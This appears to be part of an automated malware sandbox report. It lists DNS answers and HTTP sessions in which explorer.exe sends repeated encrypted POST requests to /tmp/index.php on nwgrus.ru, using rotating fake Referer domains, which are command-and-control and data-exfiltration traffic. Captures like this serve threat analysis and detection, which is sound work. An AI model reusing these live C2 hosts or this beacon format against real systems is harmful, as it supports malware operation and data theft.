                                                                      Oct 3, 2024 12:27:20.020610094 CEST1.1.1.1192.168.2.40xf74eNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                      Oct 3, 2024 12:27:20.020610094 CEST1.1.1.1192.168.2.40xf74eNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                      Oct 3, 2024 12:27:25.537017107 CEST1.1.1.1192.168.2.40x6a1cNo error (0)nwgrus.ru58.151.148.90A (IP address)IN (0x0001)false
                                                                      Oct 3, 2024 12:27:25.537017107 CEST1.1.1.1192.168.2.40x6a1cNo error (0)nwgrus.ru185.12.79.25A (IP address)IN (0x0001)false
                                                                      Oct 3, 2024 12:27:25.537017107 CEST1.1.1.1192.168.2.40x6a1cNo error (0)nwgrus.ru93.118.137.82A (IP address)IN (0x0001)false
                                                                      Oct 3, 2024 12:27:25.537017107 CEST1.1.1.1192.168.2.40x6a1cNo error (0)nwgrus.ru105.197.97.247A (IP address)IN (0x0001)false
                                                                      Oct 3, 2024 12:27:25.537017107 CEST1.1.1.1192.168.2.40x6a1cNo error (0)nwgrus.ru95.86.30.3A (IP address)IN (0x0001)false
                                                                      Oct 3, 2024 12:27:25.537017107 CEST1.1.1.1192.168.2.40x6a1cNo error (0)nwgrus.ru109.175.29.39A (IP address)IN (0x0001)false
                                                                      Oct 3, 2024 12:27:25.537017107 CEST1.1.1.1192.168.2.40x6a1cNo error (0)nwgrus.ru130.204.29.121A (IP address)IN (0x0001)false
                                                                      Oct 3, 2024 12:27:25.537017107 CEST1.1.1.1192.168.2.40x6a1cNo error (0)nwgrus.ru187.211.212.67A (IP address)IN (0x0001)false
                                                                      Oct 3, 2024 12:27:25.537017107 CEST1.1.1.1192.168.2.40x6a1cNo error (0)nwgrus.ru190.219.117.240A (IP address)IN (0x0001)false
                                                                      Oct 3, 2024 12:27:25.537017107 CEST1.1.1.1192.168.2.40x6a1cNo error (0)nwgrus.ru190.220.21.28A (IP address)IN (0x0001)false
                                                                      Oct 3, 2024 12:27:25.537058115 CEST1.1.1.1192.168.2.40x6a1cNo error (0)nwgrus.ru58.151.148.90A (IP address)IN (0x0001)false
                                                                      Oct 3, 2024 12:27:25.537058115 CEST1.1.1.1192.168.2.40x6a1cNo error (0)nwgrus.ru185.12.79.25A (IP address)IN (0x0001)false
                                                                      Oct 3, 2024 12:27:25.537058115 CEST1.1.1.1192.168.2.40x6a1cNo error (0)nwgrus.ru93.118.137.82A (IP address)IN (0x0001)false
                                                                      Oct 3, 2024 12:27:25.537058115 CEST1.1.1.1192.168.2.40x6a1cNo error (0)nwgrus.ru105.197.97.247A (IP address)IN (0x0001)false
                                                                      Oct 3, 2024 12:27:25.537058115 CEST1.1.1.1192.168.2.40x6a1cNo error (0)nwgrus.ru95.86.30.3A (IP address)IN (0x0001)false
                                                                      Oct 3, 2024 12:27:25.537058115 CEST1.1.1.1192.168.2.40x6a1cNo error (0)nwgrus.ru109.175.29.39A (IP address)IN (0x0001)false
                                                                      Oct 3, 2024 12:27:25.537058115 CEST1.1.1.1192.168.2.40x6a1cNo error (0)nwgrus.ru130.204.29.121A (IP address)IN (0x0001)false
                                                                      Oct 3, 2024 12:27:25.537058115 CEST1.1.1.1192.168.2.40x6a1cNo error (0)nwgrus.ru187.211.212.67A (IP address)IN (0x0001)false
                                                                      Oct 3, 2024 12:27:25.537058115 CEST1.1.1.1192.168.2.40x6a1cNo error (0)nwgrus.ru190.219.117.240A (IP address)IN (0x0001)false
                                                                      Oct 3, 2024 12:27:25.537058115 CEST1.1.1.1192.168.2.40x6a1cNo error (0)nwgrus.ru190.220.21.28A (IP address)IN (0x0001)false
                                                                      Oct 3, 2024 12:27:25.537086964 CEST1.1.1.1192.168.2.40x6a1cNo error (0)nwgrus.ru58.151.148.90A (IP address)IN (0x0001)false
                                                                      Oct 3, 2024 12:27:25.537086964 CEST1.1.1.1192.168.2.40x6a1cNo error (0)nwgrus.ru185.12.79.25A (IP address)IN (0x0001)false
                                                                      Oct 3, 2024 12:27:25.537086964 CEST1.1.1.1192.168.2.40x6a1cNo error (0)nwgrus.ru93.118.137.82A (IP address)IN (0x0001)false
                                                                      Oct 3, 2024 12:27:25.537086964 CEST1.1.1.1192.168.2.40x6a1cNo error (0)nwgrus.ru105.197.97.247A (IP address)IN (0x0001)false
                                                                      Oct 3, 2024 12:27:25.537086964 CEST1.1.1.1192.168.2.40x6a1cNo error (0)nwgrus.ru95.86.30.3A (IP address)IN (0x0001)false
                                                                      Oct 3, 2024 12:27:25.537086964 CEST1.1.1.1192.168.2.40x6a1cNo error (0)nwgrus.ru109.175.29.39A (IP address)IN (0x0001)false
                                                                      Oct 3, 2024 12:27:25.537086964 CEST1.1.1.1192.168.2.40x6a1cNo error (0)nwgrus.ru130.204.29.121A (IP address)IN (0x0001)false
                                                                      Oct 3, 2024 12:27:25.537086964 CEST1.1.1.1192.168.2.40x6a1cNo error (0)nwgrus.ru187.211.212.67A (IP address)IN (0x0001)false
                                                                      Oct 3, 2024 12:27:25.537086964 CEST1.1.1.1192.168.2.40x6a1cNo error (0)nwgrus.ru190.219.117.240A (IP address)IN (0x0001)false
                                                                      Oct 3, 2024 12:27:25.537086964 CEST1.1.1.1192.168.2.40x6a1cNo error (0)nwgrus.ru190.220.21.28A (IP address)IN (0x0001)false
                                                                      Oct 3, 2024 12:28:41.813981056 CEST1.1.1.1192.168.2.40xf081No error (0)calvinandhalls.com23.145.40.162A (IP address)IN (0x0001)false
                                                                      Oct 3, 2024 12:30:10.969168901 CEST1.1.1.1192.168.2.40x85eeNo error (0)nwgrus.ru109.175.29.39A (IP address)IN (0x0001)false
                                                                      Oct 3, 2024 12:30:10.969168901 CEST1.1.1.1192.168.2.40x85eeNo error (0)nwgrus.ru190.146.112.188A (IP address)IN (0x0001)false
                                                                      Oct 3, 2024 12:30:10.969168901 CEST1.1.1.1192.168.2.40x85eeNo error (0)nwgrus.ru180.75.11.133A (IP address)IN (0x0001)false
                                                                      Oct 3, 2024 12:30:10.969168901 CEST1.1.1.1192.168.2.40x85eeNo error (0)nwgrus.ru211.171.233.126A (IP address)IN (0x0001)false
                                                                      Oct 3, 2024 12:30:10.969168901 CEST1.1.1.1192.168.2.40x85eeNo error (0)nwgrus.ru211.171.233.129A (IP address)IN (0x0001)false
                                                                      Oct 3, 2024 12:30:10.969168901 CEST1.1.1.1192.168.2.40x85eeNo error (0)nwgrus.ru130.204.29.121A (IP address)IN (0x0001)false
                                                                      Oct 3, 2024 12:30:10.969168901 CEST1.1.1.1192.168.2.40x85eeNo error (0)nwgrus.ru196.189.156.245A (IP address)IN (0x0001)false
                                                                      Oct 3, 2024 12:30:10.969168901 CEST1.1.1.1192.168.2.40x85eeNo error (0)nwgrus.ru175.119.10.231A (IP address)IN (0x0001)false
                                                                      Oct 3, 2024 12:30:10.969168901 CEST1.1.1.1192.168.2.40x85eeNo error (0)nwgrus.ru78.89.199.216A (IP address)IN (0x0001)false
                                                                      Oct 3, 2024 12:30:10.969168901 CEST1.1.1.1192.168.2.40x85eeNo error (0)nwgrus.ru181.52.122.51A (IP address)IN (0x0001)false
                                                                      Oct 3, 2024 12:30:10.969219923 CEST1.1.1.1192.168.2.40x85eeNo error (0)nwgrus.ru109.175.29.39A (IP address)IN (0x0001)false
                                                                      Oct 3, 2024 12:30:10.969219923 CEST1.1.1.1192.168.2.40x85eeNo error (0)nwgrus.ru190.146.112.188A (IP address)IN (0x0001)false
                                                                      Oct 3, 2024 12:30:10.969219923 CEST1.1.1.1192.168.2.40x85eeNo error (0)nwgrus.ru180.75.11.133A (IP address)IN (0x0001)false
                                                                      Oct 3, 2024 12:30:10.969219923 CEST1.1.1.1192.168.2.40x85eeNo error (0)nwgrus.ru211.171.233.126A (IP address)IN (0x0001)false
                                                                      Oct 3, 2024 12:30:10.969219923 CEST1.1.1.1192.168.2.40x85eeNo error (0)nwgrus.ru211.171.233.129A (IP address)IN (0x0001)false
                                                                      Oct 3, 2024 12:30:10.969219923 CEST1.1.1.1192.168.2.40x85eeNo error (0)nwgrus.ru130.204.29.121A (IP address)IN (0x0001)false
                                                                      Oct 3, 2024 12:30:10.969219923 CEST1.1.1.1192.168.2.40x85eeNo error (0)nwgrus.ru196.189.156.245A (IP address)IN (0x0001)false
                                                                      Oct 3, 2024 12:30:10.969219923 CEST1.1.1.1192.168.2.40x85eeNo error (0)nwgrus.ru175.119.10.231A (IP address)IN (0x0001)false
                                                                      Oct 3, 2024 12:30:10.969219923 CEST1.1.1.1192.168.2.40x85eeNo error (0)nwgrus.ru78.89.199.216A (IP address)IN (0x0001)false
                                                                      Oct 3, 2024 12:30:10.969219923 CEST1.1.1.1192.168.2.40x85eeNo error (0)nwgrus.ru181.52.122.51A (IP address)IN (0x0001)false
                                                                      Oct 3, 2024 12:30:10.969249010 CEST1.1.1.1192.168.2.40x85eeNo error (0)nwgrus.ru109.175.29.39A (IP address)IN (0x0001)false
                                                                      Oct 3, 2024 12:30:10.969249010 CEST1.1.1.1192.168.2.40x85eeNo error (0)nwgrus.ru190.146.112.188A (IP address)IN (0x0001)false
                                                                      Oct 3, 2024 12:30:10.969249010 CEST1.1.1.1192.168.2.40x85eeNo error (0)nwgrus.ru180.75.11.133A (IP address)IN (0x0001)false
                                                                      Oct 3, 2024 12:30:10.969249010 CEST1.1.1.1192.168.2.40x85eeNo error (0)nwgrus.ru211.171.233.126A (IP address)IN (0x0001)false
                                                                      Oct 3, 2024 12:30:10.969249010 CEST1.1.1.1192.168.2.40x85eeNo error (0)nwgrus.ru211.171.233.129A (IP address)IN (0x0001)false
                                                                      Oct 3, 2024 12:30:10.969249010 CEST1.1.1.1192.168.2.40x85eeNo error (0)nwgrus.ru130.204.29.121A (IP address)IN (0x0001)false
                                                                      Oct 3, 2024 12:30:10.969249010 CEST1.1.1.1192.168.2.40x85eeNo error (0)nwgrus.ru196.189.156.245A (IP address)IN (0x0001)false
                                                                      Oct 3, 2024 12:30:10.969249010 CEST1.1.1.1192.168.2.40x85eeNo error (0)nwgrus.ru175.119.10.231A (IP address)IN (0x0001)false
                                                                      Oct 3, 2024 12:30:10.969249010 CEST1.1.1.1192.168.2.40x85eeNo error (0)nwgrus.ru78.89.199.216A (IP address)IN (0x0001)false
                                                                      Oct 3, 2024 12:30:10.969249010 CEST1.1.1.1192.168.2.40x85eeNo error (0)nwgrus.ru181.52.122.51A (IP address)IN (0x0001)false
                                                                      • 23.145.40.164
                                                                      • https:
                                                                        • calvinandhalls.com
                                                                      • yvmmviecnxldpero.com
                                                                        • nwgrus.ru
                                                                      • fmehaoiwwenqht.net
                                                                      • pmvrpbcqomr.org
                                                                      • ehjasruwjmcyiyc.com
                                                                      • mabsoalepkufuc.com
                                                                      • wlihjqaglis.com
                                                                      • djgtchksmne.com
                                                                      • jrsqrkoonpvkf.com
                                                                      • pqllteniaumhpux.net
                                                                      • ksbeipjuadnqvhne.org
                                                                      • ikkkpskbtojtajm.com
                                                                      • tlcaywkjpltapmg.com
                                                                      • ljdtqpdqnfgadl.com
                                                                      • fmsbxuxqcel.net
                                                                      • sjpwecfehtwlg.com
                                                                      • vvymdudugxqyqgd.net
                                                                      • vctlwttuihixctye.org
                                                                      • qkabdlcselvepu.net
                                                                      • fboiokwqifnpfwwg.net
                                                                      • cjlnjwyjoxyuf.org
                                                                      • jvksadufkdlihaeq.net
                                                                      • ricjpvrheenoi.com
                                                                      • uobogpxbvskdl.net
                                                                      • vwmsjsqvwuhba.org
                                                                      • kskrxgkqoed.net
                                                                      • euceyfvfmeh.net
                                                                      • qptrydkvolka.org
                                                                      • kaqmpmaijfnk.net
                                                                      • gyvqqphlebcxdpkv.com
                                                                      • ljhchdbaaaxer.org
                                                                      • gjsnmktycknrotm.org
                                                                      • gtnnfkxyrnmdua.com
                                                                      • gjxqibcjarykr.com
                                                                      • lwriihoulvmts.org
                                                                      • nfjjiuyrybf.net
                                                                      • xtbardaliciv.com
                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.44973658.151.148.90802580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Oct 3, 2024 12:27:25.547517061 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://yvmmviecnxldpero.com/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 271
                                                                      Host: nwgrus.ru
                                                                      Oct 3, 2024 12:27:25.547517061 CEST271OUTData Raw: 3b 6e 54 64 f5 c9 19 22 db ad b5 77 04 05 7e cb 0b 0d cf 91 6f 02 e6 15 00 7d 0b 93 48 c6 c1 19 9c 5f c3 5c 75 64 20 11 98 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 77 1f a5 a4
                                                                      Data Ascii: ;nTd"w~o}H_\ud ? 9Yt M@NA .[k,vuwHyr{b\AjUhB1aC2VmER)EaT}hHd*g%U2jj_>Y460wuU@|-b,+
                                                                      Oct 3, 2024 12:27:27.326905966 CEST152INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Thu, 03 Oct 2024 10:27:26 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 04 00 00 00 72 e8 86 ea
                                                                      Data Ascii: r


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      1192.168.2.44973758.151.148.90802580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Oct 3, 2024 12:27:27.337848902 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://fmehaoiwwenqht.net/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 169
                                                                      Host: nwgrus.ru
                                                                      Oct 3, 2024 12:27:27.337883949 CEST169OUTData Raw: 3b 6e 54 64 f5 c9 19 22 db ad b5 77 04 05 7e cb 0b 0d cf 91 6f 02 e6 15 00 7d 0b 93 48 c6 c1 19 9c 5f c3 5c 75 64 20 11 98 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 77 41 d6 89
                                                                      Data Ascii: ;nTd"w~o}H_\ud ? 9Yt M@NA -[k,vuwAyLnrjRgQ]6xr@ND[G`5?<-Fx<55K_A
                                                                      Oct 3, 2024 12:27:30.072880030 CEST484INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Thu, 03 Oct 2024 10:27:29 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      2192.168.2.44973858.151.148.90802580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Oct 3, 2024 12:27:30.082432032 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://pmvrpbcqomr.org/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 180
                                                                      Host: nwgrus.ru
                                                                      Oct 3, 2024 12:27:30.082432032 CEST180OUTData Raw: 3b 6e 54 64 f5 c9 19 22 db ad b5 77 04 05 7e cb 0b 0d cf 91 6f 02 e6 15 00 7d 0b 93 48 c6 c1 19 9c 5f c3 5c 75 64 20 11 98 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 6e 28 ca 93
                                                                      Data Ascii: ;nTd"w~o}H_\ud ? 9Yt M@NA -[k,vun(T~tnCSvl;J,tm\9MEmSGUc(??/mysW8
                                                                      Oct 3, 2024 12:27:32.842261076 CEST484INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Thu, 03 Oct 2024 10:27:32 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      3192.168.2.44973958.151.148.90802580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Oct 3, 2024 12:27:32.850625038 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://ehjasruwjmcyiyc.com/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 188
                                                                      Host: nwgrus.ru
                                                                      Oct 3, 2024 12:27:32.850650072 CEST188OUTData Raw: 3b 6e 54 64 f5 c9 19 22 db ad b5 77 04 05 7e cb 0b 0d cf 91 6f 02 e6 15 00 7d 0b 93 48 c6 c1 19 9c 5f c3 5c 75 64 20 11 98 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 31 45 de f5
                                                                      Data Ascii: ;nTd"w~o}H_\ud ? 9Yt M@NA -[k,vu1EQ@nAu<6*#Mk1_-OER$%F3cw%3y]9](']
                                                                      Oct 3, 2024 12:27:34.344331026 CEST137INHTTP/1.1 200 OK
                                                                      Server: nginx/1.26.0
                                                                      Date: Thu, 03 Oct 2024 10:27:34 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      4192.168.2.44974058.151.148.90802580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Oct 3, 2024 12:27:34.353441000 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://mabsoalepkufuc.com/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 123
                                                                      Host: nwgrus.ru
                                                                      Oct 3, 2024 12:27:34.353477001 CEST123OUTData Raw: 3b 6e 54 64 f5 c9 19 22 db ad b5 77 04 05 7e cb 0b 0d cf 91 6f 02 e6 15 00 7d 0b 93 48 c6 c1 19 9c 5f c3 5c 75 64 20 11 98 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 41 3d d3 9c
                                                                      Data Ascii: ;nTd"w~o}H_\ud ? 9Yt M@NA -[k,vuA=`MSv}s8~26Z?
                                                                      Oct 3, 2024 12:27:37.884989977 CEST484INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Thu, 03 Oct 2024 10:27:35 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      5192.168.2.44974158.151.148.90802580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Oct 3, 2024 12:27:37.903688908 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://wlihjqaglis.com/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 322
                                                                      Host: nwgrus.ru
                                                                      Oct 3, 2024 12:27:37.903723955 CEST322OUTData Raw: 3b 6e 54 64 f5 c9 19 22 db ad b5 77 04 05 7e cb 0b 0d cf 91 6f 02 e6 15 00 7d 0b 93 48 c6 c1 19 9c 5f c3 5c 75 64 20 11 98 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 74 44 b0 a4
                                                                      Data Ascii: ;nTd"w~o}H_\ud ? 9Yt M@NA -[k,vutDKKn|c(M^k;ff1Yl"GQRLZI T[LLLY`&YbsV/kA]t3nzd3
                                                                      Oct 3, 2024 12:27:39.642565966 CEST137INHTTP/1.1 200 OK
                                                                      Server: nginx/1.26.0
                                                                      Date: Thu, 03 Oct 2024 10:27:39 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      6192.168.2.44974258.151.148.90802580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Oct 3, 2024 12:27:39.650537014 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://djgtchksmne.com/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 133
                                                                      Host: nwgrus.ru
                                                                      Oct 3, 2024 12:27:39.650572062 CEST133OUTData Raw: 3b 6e 54 64 f5 c9 19 22 db ad b5 77 04 05 7e cb 0b 0d cf 91 6f 02 e6 15 00 7d 0b 93 48 c6 c1 19 9c 5f c3 5c 75 64 20 11 98 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 77 4f af 87
                                                                      Data Ascii: ;nTd"w~o}H_\ud ? 9Yt M@NA -[k,vuwO8abXma[/i{1Uh5|^
                                                                      Oct 3, 2024 12:27:41.164438963 CEST137INHTTP/1.1 200 OK
                                                                      Server: nginx/1.26.0
                                                                      Date: Thu, 03 Oct 2024 10:27:40 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      7192.168.2.44974358.151.148.90802580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Oct 3, 2024 12:27:41.174376011 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://jrsqrkoonpvkf.com/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 160
                                                                      Host: nwgrus.ru
                                                                      Oct 3, 2024 12:27:41.174412012 CEST160OUTData Raw: 3b 6e 54 64 f5 c9 19 22 db ad b5 77 04 05 7e cb 0b 0d cf 91 6f 02 e6 15 00 7d 0b 93 48 c6 c1 19 9c 5f c3 5c 75 64 20 11 98 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 3c 4c d3 b6
                                                                      Data Ascii: ;nTd"w~o}H_\ud ? 9Yt M@NA -[k,vu<L]SWgb;]t5UVfV]<XT2#zB$E
